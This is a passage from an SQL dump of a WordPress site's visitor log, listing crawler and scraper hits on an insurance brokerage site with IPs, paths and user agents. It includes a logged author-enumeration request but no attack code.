014','1462666808','79.116.24.187','79-116-24-187.rdsnet.ro','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26142,'0b_3ba3ab60afc4774be697840f17e9a014','1462666809','79.116.24.187','79-116-24-187.rdsnet.ro','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26145,'0b_3ba3ab60afc4774be697840f17e9a014','1462666810','79.116.24.187','79-116-24-187.rdsnet.ro','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26148,'0b_3ba3ab60afc4774be697840f17e9a014','1462666811','79.116.24.187','79-116-24-187.rdsnet.ro','/contact/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26150,'0b_3ba3ab60afc4774be697840f17e9a014','1462666812','79.116.24.187','79-116-24-187.rdsnet.ro','/contact/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26153,'0b_3ba3ab60afc4774be697840f17e9a014','1462666813','79.116.24.187','79-116-24-187.rdsnet.ro','/igo/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26156,'0b_3ba3ab60afc4774be697840f17e9a014','1462666814','79.116.24.187','79-116-24-187.rdsnet.ro','/igo/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26159,'0b_3ba3ab60afc4774be697840f17e9a014','1462666814','79.116.24.187','79-116-24-187.rdsnet.ro','/licensing-contracting/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26160,'0b_3ba3ab60afc4774be697840f17e9a014','1462666815','79.116.24.187','79-116-24-187.rdsnet.ro','/licensing-contracting/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26163,'0b_3ba3ab60afc4774be697840f17e9a014','1462666816','79.116.24.187','79-116-24-187.rdsnet.ro','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26166,'0b_3ba3ab60afc4774be697840f17e9a014','1462666817','79.116.24.187','79-116-24-187.rdsnet.ro','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26168,'0b_3ba3ab60afc4774be697840f17e9a014','1462666818','79.116.24.187','79-116-24-187.rdsnet.ro','/register/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26169,'0b_3ba3ab60afc4774be697840f17e9a014','1462666819','79.116.24.187','79-116-24-187.rdsnet.ro','/register/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26171,'0b_3ba3ab60afc4774be697840f17e9a014','1462666820','79.116.24.187','79-116-24-187.rdsnet.ro','/term-quotes/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26174,'0b_3ba3ab60afc4774be697840f17e9a014','1462666821','79.116.24.187','79-116-24-187.rdsnet.ro','/term-quotes/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26175,'0b_3ba3ab60afc4774be697840f17e9a014','1462666822','79.116.24.187','79-116-24-187.rdsnet.ro','/meet-the-eib-team/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26178,'0b_3ba3ab60afc4774be697840f17e9a014','1462666822','79.116.24.187','79-116-24-187.rdsnet.ro','/meet-the-eib-team/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26181,'0b_b66dfadb1a99bffd07eec789287828cd','1462666871','157.55.39.54','msnbot-157-55-39-54.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26184,'0b_b66dfadb1a99bffd07eec789287828cd','1462666872','157.55.39.54','msnbot-157-55-39-54.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26187,'0b_b66dfadb1a99bffd07eec789287828cd','1462666873','157.55.39.54','msnbot-157-55-39-54.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26189,'0b_b66dfadb1a99bffd07eec789287828cd','1462666874','157.55.39.54','msnbot-157-55-39-54.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26192,'0b_b66dfadb1a99bffd07eec789287828cd','1462666875','157.55.39.54','msnbot-157-55-39-54.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26195,'0b_b66dfadb1a99bffd07eec789287828cd','1462666875','157.55.39.54','msnbot-157-55-39-54.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26196,'0b_b28e3d05aca621ead726d2bc5bd24dad','1462666961','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26199,'0b_b28e3d05aca621ead726d2bc5bd24dad','1462666973','207.46.13.61','msnbot-207-46-13-61.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26202,'0b_b28e3d05aca621ead726d2bc5bd24dad','1462666999','207.46.13.61','msnbot-207-46-13-61.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26204,'0b_b28e3d05aca621ead726d2bc5bd24dad','1462667000','207.46.13.61','msnbot-207-46-13-61.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26205,'0b_e5e70d03072a53903d1abe44cc636ec0','1462669000','195.154.56.126','195-154-56-126.rev.poneytelecom.eu','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','0','0',0),(26208,'0b_e5e70d03072a53903d1abe44cc636ec0','1462669000','195.154.56.126','195-154-56-126.rev.poneytelecom.eu','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','0','0',0),(26210,'0b_cf6c106cdc9d15f1c2b5c7e620de22ae','1462672540','40.77.167.92','msnbot-40-77-167-92.search.msn.com','/igo','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(26213,'0b_cf6c106cdc9d15f1c2b5c7e620de22ae','1462672556','40.77.167.92','msnbot-40-77-167-92.search.msn.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(26214,'0b_a21e74775f3f8f2a7210592df918f878','1462672760','91.200.12.53','dedic658.hidehost.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2327.68 Safari/537.36','','',0,'MacOSX','Chrome 42','us','','','','','','','0','0',0),(26217,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672911','5.9.98.130','static.130.98.9.5.clients.your-server.de','/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26220,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672915','5.9.98.130','static.130.98.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26223,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672917','5.9.98.130','static.130.98.9.5.clients.your-server.de','/agent-tools/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26226,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672919','5.9.98.130','static.130.98.9.5.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26229,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672921','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26232,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672923','5.9.98.130','static.130.98.9.5.clients.your-server.de','/insentives/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26235,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672926','5.9.98.130','static.130.98.9.5.clients.your-server.de','/licensing-contracting/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26237,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672928','5.9.98.130','static.130.98.9.5.clients.your-server.de','/carriers/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26240,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672930','5.9.98.130','static.130.98.9.5.clients.your-server.de','/contact/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26241,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672932','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-status/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26243,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672934','5.9.98.130','static.130.98.9.5.clients.your-server.de','/forms/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26244,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672936','5.9.98.130','static.130.98.9.5.clients.your-server.de','/igo/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26247,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672938','5.9.98.130','static.130.98.9.5.clients.your-server.de','/term-quotes/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26250,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672940','5.9.98.130','static.130.98.9.5.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26252,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672943','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26255,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672945','5.9.98.130','static.130.98.9.5.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26256,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672948','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26259,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672951','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26261,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672954','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26264,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672956','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26265,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672958','5.9.98.130','static.130.98.9.5.clients.your-server.de','/members/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26268,'0b_6ed7cbfe9d3a892a2497aab5290cc642','1462672961','5.9.98.130','static.130.98.9.5.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(26271,'0b_178091845b1711040d2d10325f2b02df','1462674204','207.46.13.100','msnbot-207-46-13-100.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26274,'0b_1977f7cde6044fbde998bb6188f7efce','1462674264','37.115.190.10','37-115-190-10-broadband.kyivstar.net','/contact/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26277,'0b_777cfa58ff4aa1391b10b54a806e008d','1462675093','40.77.167.92','msnbot-40-77-167-92.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(26279,'0b_c0e7699ad6a37037eee37a965cc15890','1462675716','66.249.66.24','crawl-66-249-66-24.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26280,'0b_c0e7699ad6a37037eee37a965cc15890','1462675716','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26282,'0b_059ac30b65fbded507e4cc61c43124c3','1462675866','52.88.39.19','ec2-52-88-39-19.us-west-2.compute.amazonaws.com','/','Ruby','','',0,'','','','','','','','','','0','0',0),(26285,'0b_bf668130886e2e0236526cff6adf9bee','1462676323','207.46.13.180','msnbot-207-46-13-180.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26288,'0b_d616ab3bcc6663cb1a9cbd5b82a36e65','1462676668','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(26291,'0b_d616ab3bcc6663cb1a9cbd5b82a36e65','1462676669','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/?page_id=169','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(26294,'0b_d616ab3bcc6663cb1a9cbd5b82a36e65','1462676669','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(26295,'0b_d616ab3bcc6663cb1a9cbd5b82a36e65','1462676670','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(26297,'0b_d616ab3bcc6663cb1a9cbd5b82a36e65','1462676671','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(26298,'0b_d616ab3bcc6663cb1a9cbd5b82a36e65','1462676672','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(26301,'0b_d616ab3bcc6663cb1a9cbd5b82a36e65','1462676672','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(26304,'0b_d616ab3bcc6663cb1a9cbd5b82a36e65','1462676673','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(26307,'0b_03989c0c4434ca633e990f82778ad87c','1462676745','141.8.143.235','spider-141-8-143-235.yandex.com','/calc.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(26309,'0b_1980b9449bb1b1c0c85c4ed5938b7c57','1462678433','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(26310,'0b_c24971eee3d5a70520e7ff118d915925','1462678558','64.246.161.190','www.whois.sc','/robots.txt','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(26313,'0b_c24971eee3d5a70520e7ff118d915925','1462678560','64.246.161.190','www.whois.sc','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','http://whois.domaintools.com/empireins.com','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(26316,'0b_4ba1ae3c1ea67625cced78a824fcee1a','1462680327','66.249.66.8','crawl-66-249-66-8.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26319,'0b_4ba1ae3c1ea67625cced78a824fcee1a','1462680378','66.249.66.14','crawl-66-249-66-14.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26322,'0b_4b66ba195876915d26917a900b67a10b','1462680585','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(26324,'0b_df78660165ba7285c60f3464ea69613a','1462682032','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://ru.meteotrend.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(26327,'0b_df78660165ba7285c60f3464ea69613a','1462682032','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://ru.meteotrend.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(26328,'0b_d6ad875a0b923a082046d11b60f3f922','1462682533','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(26330,'0b_28ec10b5a6dbf83cac09c163b2aca748','1462688407','192.210.228.116','192-210-228-116-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 35','us','','','','','','','0','0',0),(26331,'0b_28ec10b5a6dbf83cac09c163b2aca748','1462688409','192.210.228.116','192-210-228-116-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0','http://www.empireins.com','',0,'Win8 x64','Firefox 35','us','','','','','','','0','0',0),(26334,'0b_17d9f60a21821d5fb5bd0a64d0d2df2e','1462688417','217.69.133.220','fetcher2-1.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26336,'0b_17d9f60a21821d5fb5bd0a64d0d2df2e','1462688419','217.69.133.224','fetcher2-5.p.mail.ru','/SSO/235_38.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26337,'0b_17d9f60a21821d5fb5bd0a64d0d2df2e','1462688423','217.69.133.222','fetcher2-3.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26339,'0b_17d9f60a21821d5fb5bd0a64d0d2df2e','1462688425','217.69.133.220','fetcher2-1.p.mail.ru','/SSO/235_38.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/SSO/235_38.html','',0,'Linux','','ru','','','','','','','0','0',0),(26342,'0b_e18f0124539cc6feadf2b9ecb050fda1','1462692594','204.79.180.30','204.79.180.30','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)','','',0,'WinVista','IE 9','us','','','','','','','0','0',0),(26345,'0b_5a52852267199bc95a5ba05d4039052c','1462694058','217.69.133.225','fetcher2-6.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26348,'0b_5a52852267199bc95a5ba05d4039052c','1462694060','217.69.133.225','fetcher2-6.p.mail.ru','/paramed.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26351,'0b_5a52852267199bc95a5ba05d4039052c','1462694063','217.69.133.221','fetcher2-2.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26354,'0b_5a52852267199bc95a5ba05d4039052c','1462694064','217.69.133.223','fetcher2-4.p.mail.ru','/products.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26355,'0b_37e5a05363a89177c400c1d4867e83e1','1462694066','217.69.133.68','fetcher2.p.mail.ru','/paramed.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/paramed.htm','',0,'Linux','','ru','','','RU_Bot','','','','0','0',0),(26357,'0b_5a52852267199bc95a5ba05d4039052c','1462694086','217.69.133.226','fetcher2-7.p.mail.ru','/SSO/235_29.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26358,'0b_bed4774ae2d29c525688b4a3b91c321c','1462695092','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(26361,'0b_dd65e17d8b3824eee7af2ac4e60447cd','1462695257','66.249.66.24','crawl-66-249-66-24.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26363,'0b_6447552745eb10f70f5771c5199198bf','1462695903','192.210.228.227','192-210-228-227-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26366,'0b_6447552745eb10f70f5771c5199198bf','1462695905','192.210.228.227','192-210-228-227-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26367,'0b_48bc87081d073e12ffb968d158bf0b54','1462698229','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26370,'0b_af02bca1679e5f238984572811ff25a7','1462698364','45.33.59.157','li1009-157.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(26372,'0b_94afe64feb90327aced9895c4df41b82','1462699630','192.210.228.62','192-210-228-62-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26375,'0b_94afe64feb90327aced9895c4df41b82','1462699632','192.210.228.62','192-210-228-62-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26376,'0b_102edee9332a969c008476b41d127a3d','1462702410','117.78.13.18','117.78.13.18','/robots.txt','nutch-1.4/Nutch-1.4','','',0,'','','us','','','nutch','','','','0','0',0),(26379,'0b_102edee9332a969c008476b41d127a3d','1462702416','117.78.13.18','117.78.13.18','/','nutch-1.4/Nutch-1.4','','',0,'','','us','','','nutch','','','','0','0',0),(26381,'0b_c781e23aaab6e4d48a8eb1763f743184','1462702472','2.121.255.148','0279ff94.bb.sky.com','/carriers/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26384,'0b_376d367ab95da01baac3c7cefa96d980','1462704598','5.153.233.130','5.153.233.130','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(26387,'0b_376d367ab95da01baac3c7cefa96d980','1462704608','5.153.233.130','5.153.233.130','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 